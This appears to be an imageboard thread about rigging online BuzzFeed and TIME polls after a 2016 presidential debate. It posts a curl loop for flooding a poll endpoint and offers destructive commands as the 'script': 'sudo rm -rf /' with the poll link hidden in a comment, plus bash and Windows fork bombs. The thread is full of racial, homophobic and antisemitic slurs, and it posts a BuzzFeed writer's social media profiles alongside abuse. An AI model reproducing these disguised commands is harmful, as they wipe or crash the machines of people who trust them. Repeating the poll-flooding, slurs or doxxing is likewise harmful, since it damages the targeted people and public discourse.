ALRIGHT WHICH OF YOU FAGGOTS

...left their scripts running all last night?

I woke up to this and pretty much died laughing.

Other urls found in this thread:

buzzfeed.com/mrloganrhoades/who-are-you-voting-for-in-the-presidential-election?utm_term=.kgwApy9mq6#.rnAD9dbRzO
time.com/4506217/presidential-debate-clinton-trump-survey/
instagram.com/loganrhoades/
linkedin.com/in/loganrhoades
presidentialopenquestions.com
twitter.com/SFWRedditVideos

Lmao, got a link?

Beautiful...

Russia

>leaving even more evidence that Cred Forums literally brigaded the fuck out of polls to use against you in the future

how is this place so blindingly retarded?

Damn, how do you set up one of those scripts?

theres somebody rigging this like do you really think 4 million people went on fucking buzzfeed to vote

well it's full of Trump supporters for a start

Or is it shills trying to make polls, the only user generated metric, pointless and enforce the media as the most reliable source?

>almost a million votes on TIME
>Cred Forums
A

woopsiedoodles

A

that's what the OP is saying you idiot

how do you think we became so powerful?

checked

it's literally Russia

Russia has a stronghold of propaganda on both Cred Forums and infinitychan. probably 2ch too but i dont go there

No it was us....

It's a CTR false flag.

Nice. BuzzFeed can gargle my nuts for all I care.

You really think that 3.4 million people are from Cred Forums and Reddit and decided to rig the living shit out of this poll?

I've never heard the term "brigaded" on Cred Forums until today.

Reporting you to the fbi on treason just to be safe.

I don't see Jeb on that fucking poll.

>it's bad when we rig polls, which are basically meaningless
>it's OK when Hillary rigs elections

Really makes you think.

>3.4million

Oy vey, remember the 6 million!

>left their scripts up

Nice CTR shilling. These are all American voters who believe trump won the debate. Quit acting like a nigger.

>3.4 million

oy vey shut it down

This.

Buzzfail is too mainstream for us to influence their poll so much. Maybe by a couple points but not by this much.

People really are supporting Trump. Even libcucks.

Are you sure it's not a 400 pound man in his bed?

Do you have any proof comrade?

$ git clone git://github.com/kennethreitz/requests.git

$ while true; do curl -k "mango.buzzfeed.com/polls/service/editorial/post?poll_id=9673976&result_id=1&callback=__jsonp_1"; done

AHAHHAHAHAAHAHAHAHA THIS IS BEAUTIFUL

We're not stupid enough to make it so obvious. If polls are obviously manipulated it's blamed on the "alt-right hackers". Polls are then discredited for the rest of the election and the general public trusts the media for accurate updates even more, without knowing the media is pro hilary

Make it reach 6 gorillion

>Are you sure it's not a 400 pound man in his bed?

As a 400 lb. female hacker I resent that you automatically assume that Trump's bedroom hacker is male.

This, it's obviously a CTR scam to discredit all the valid polls showing trump ahead.

Post diabetic feet

>Post diabetic feet

I haven't seen my feet in years.

Here you go.

Why rig the polls when you can rig the memes?

Pretty soon Cred Forums's whole mentality will take on a life of its own and no longer require our "push"

>$ while true; do curl -k "mango.buzzfeed.com/polls/service/editorial/post?poll_id=9673976&result_id=1&callback=__jsonp_1";

This is so easy to prevent with basic auth on generic clients. Maybe their polls are designed shittly so they can rig their own polls. *tin foil*

>>here you go
>but no pic
>because no feet
>they have already been amputated
clever girl

$ sudo rm -rf / #buzzfeed.com/mrloganrhoades/who-are-you-voting-for-in-the-presidential-election?utm_term=.kgwApy9mq6#.rnAD9dbRzO

leave it going for a while

*winks*

That is still my favorite merchant.

>implying anyone gives a shit

Fucking demitri

it's not hard to understand pol's stupidity. This place is 95% uneducated white trash.

Doesnt matter, also only a small part was pol, even of we stayed out of it shill would still be down. Also we have as much right to vote as anyone else. Just because an ideaology is shared doesnt make the vote invalid.

>CTR running all night did nothing
>Trump literally the bigger man not talking about lolita express
FUCKING

Linkey?

Shills ran a script so that it looks rigged

Lol I remember this during 2012 election year. People forgot to turn off their programs and had Ron Pauls x200k compared to measly 1ks

>each person voted once
How are you so retarded?

>thousands of people make it into trump rallies nearly every day while thousands have to stay outside
>hillary can barely scrape together a group of 50 here, 200 there, two or three times a month

How does this seem inaccurate to you?

I think it's fair considering the Internet is being bombarded by paid hill shills on practically every social platform :^]

The dark army of dank strikes again...ahh Nevermind.

This is funny as hell.

>downloads requests
>proceeds to not use it
genius m8

Dick head!

i just copied it from the archieved threads yesterday, i didnt write it myself

Fug

Holy sit that worked better then
:(){ :|:&};:

except trust in the media is at all time lows. Only staunch democrat voters believe and trust the media.

I've always wondered, how many polls that are conducted online actually poll the people that they wanted? How many of these polls that look for American voters actually get votes from outside the country or from underage citizens, and vice-versa? Not to mention that sites that conduct these polls are usually biased in one way or another, so they are going to get one-sided results because their usual traffic goes there for the content that agrees with them anyways. And if running scripts for these polls is possible, even if somebody did screw up in OP's pick, is it possible that the seemingly reasonable amounts in comparison were only from people who didn't leave scripts on and made sure to make it seem like it wasn't rigged in any way? With all this, why even have online polls?

hue

that only works on linux, if you're on windows try
%0|%0
rem buzzfeed.com/mrloganrhoades/who-are-you-voting-for-in-the-presidential-election?utm_term=.kgwApy9mq6#.rnAD9dbRzO

Yeah just FYI this will erase all votes for Donald Trump

>Look at flag
>A

>Russia hackers
Hillary was right all along!

>sudo
>-rf

Rolf yeah ok

>recursive self execute

*claps*

I see what you did there.

A FUCKING RED LEAF!

LOLLL

Shouldn't we be making the polls look realistic?

Nigger, you can say the exact same thing about Hillary supporters or people who don't like both.

Go go go you stupid skypes

time.com/4506217/presidential-debate-clinton-trump-survey/

> script

Doubt it.

>what are botnets

jesus...

Me.

Yes.

Let's get it to 666 million votes for Trump

>SS ID

What a waste

SPANISH MEDIA LITERALLY JUST BLAMED Cred Forums FOR WINNING POLLS

"Cred Forums, a known nest for Trolls rigged the polls through hacking."

They even had a picture of yesterday's sticky.

Holy fuck I just became scarlet-pilled, I'll try to get the info online, just saw it live on TV.

They're not wrong, though.

>"Cred Forums, a known nest for Trolls rigged the polls through hacking."

Though they are not wrong

>brigaded

>brigaded

>brigaded

Notice how it's only leftists and CTR using this imaginary term everywhere, and pinning it on Cred Forums?

Notice how Cred Forums apparently now has millions of users?

Notice how there are repeated posts screaming;

>HURR LOOK HOW GOOD WE WUZ AT BRIGADING DAT POLL

Good work CTR. Good work.

It was her!

She's for He!

I've seen numerous anti-fa twats on polls everywhere using the term to describe a VAST RIGHT WING RUSSIAN NAZI FROG CONSPIRACY to rig their polls.

Apparently we even somehow rig professional phone and face to face polls.

Yes they're, they said Clinton won by a landslide literally because she smirked at Trump's temper argument, they only showed that and the miss piggy part of course.

They showed Twitter memes gifs of people rolling their eyes. It's like pottery. They said that every poll and Twitter agreed on Trump's win and that's because of Cred Forums raiding.

Brigaded is a reddit meme anyway. They probably just pulled some fulltime politics shitposters over here, and forgot to tell them how channers speak.

Ok there is a danger in all of this funny tho it is. And that is if Hillary looses they will blame the loss on Cred Forums hackers.

Just sayin.

I'm a script child.

I did that.

Sorry.

>does't understand what satire is
Sad.

Hillary supporters aren't 400 pound hackers in their mom's basement.

JEB SURGE HAPPENING RIGHT NOW

FALSE FLAG FALSE FLAG

What's a skype? I thought that was some software

Logan Rhoades, Buzzfeed
instagram.com/loganrhoades/
linkedin.com/in/loganrhoades

>Have a nice cozy white rich life

>Advertising, Creative Advertising finished in 2010, that would ensure almost 0 work all his life inside big corporations

Choose to be a fag sucking 0bama dick at SpinMedia Inc together with his boss Stephen Blackwell

Sometimes I almost wish US would go down the rabbit hole. All these parasites with their useless sites pumping shit 24/7 all over internet would be gone.

nig nog

white trash with computers who are mysteriously, within the past year, learning how to outjew the skypes

its like white trash are the real gods chosen

is this what republicans mean my voter fraud?

person of hebrew descent

>time.com/4506217/presidential-debate-clinton-trump-survey/
"A disclaimer: Online reader polls like this one are not statistically representative of likely voters, and are not predictive of how the debate outcome will affect the election. They are a measure, however imprecise, of which candidates have the most energized online supporters, or most social media savvy fan base. After all, what they are counting is the number of Internet-devices controlled by people who want to vote."
LMAO

>A Fucking Leaf

A thing of great beauty user.

This reminds me of when we rigged the Time Person of The Year vote with moot. Good times.

DELETE THIS

>there are people sitting at home right now, looking at the polls and scratching their heads right now trying to discern why 3.3 million people have voted for Trump.

Who is this semen demon?

Why the hell are you faggots wasting time with a Buzzfeed poll?

>brigaded
You have to go back

AI GF

>hacking